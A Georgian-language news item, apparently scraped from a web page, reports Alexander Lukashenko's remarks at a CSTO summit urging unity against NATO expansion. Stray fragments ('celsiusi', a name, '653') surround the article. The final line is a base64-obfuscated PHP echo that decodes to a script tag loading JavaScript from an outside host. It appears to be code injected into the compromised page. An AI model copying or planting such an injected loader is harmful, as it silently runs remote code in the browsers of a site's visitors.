celsiusi
ავერსი შნაიდერი
ბელარუსის ლიდერის ალექსანდრე ლუკაშენკოს განცხადებით, კოლექტიურ დასავლეთს არ სურს მიიღოს მსოფლიო წესრიგის უნიპოლარული სისტემის წარსულში დარჩენა და სასტიკ ბრძოლას აწარმოებს თავისი პოზიციების შესანარჩუნებლად.
 
მისი თქმით, ნატო რესპუბლიკის დასავლეთ საზღვრებთან იარაღს „აჟღარუნებს“ და თავის შემადგენლობაში „ექაჩება მანამდე ნეიტრალურ ქვეყნებს“.
 
 
„ჩვენი შეხვედრა მიმდინარეობს რთულ დროს, სამყაროს ხელახალი დაყოფის დროს. მსოფლიო წესრიგის უნიპოლარული სისტემა წარსულს ჩაბარდა, მაგრამ კოლექტიური დასავლეთი აწარმოებს სასტიკ ბრძოლას თავისი პოზიციების შესანარჩუნებლად. 
 
ლუკაშენკომ კოლექტიური უსაფრთხოების ხელშეკრულების ორგანიზაციის (CSTO) სამიტზე აღნიშნა, რომ ნატო მოქმედებს პრინციპით „ვინც ჩვენთან არ არის, ის ჩვენს წინააღმდეგაა.“  
 
მისი თქმით, ნატო-ს წინააღმდეგ მხოლოდ რუსეთმა არ უნდა იბრძოლოს.
 
„არა მხოლოდ რუსეთმა უნდა გამოხატოს შეშფოთება და მარტომ იბრძოლოს ნატოს გაფართოების მცდელობის წინააღმდეგ“, - განაცხადა ლუკაშენკომ.
 
მან კოლექტიური უსაფრთხოების ხელშეკრულების ორგანიზაციის ქვეყნებს მეტი ერთიანობისკენ მოუწოდა.
 
„დაე იფიქრონ მათ [საგარეო საქმეთა მინისტრებმა] იმაზე, თუ როგორ უნდა ვუპასუხოთ პოლიტიკურად ნატოს გაფართოების ახალ ტალღას ცნობილი სახელმწიფოების გაჟღერებული ზრახვების გათვალისწინებით. ორგანიზაციაში ჩვენი პოზიცია დროულად უნდა შევიმუშაოთ და მივაწოდოთ მსოფლიო საზოგადოებას. ჩვენ ამაში ერთიანი უნდა ვიყოთ.
 
ჩვენ უნდა შევიმუშაოთ ჩვენი პოზიცია და წინასწარ მივაწოდოთ მსოფლიო საზოგადოებას. ჩვენ ამაში ერთიანი უნდა ვიყოთ“, - აღნიშნა ლუკაშენკომ.
653
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");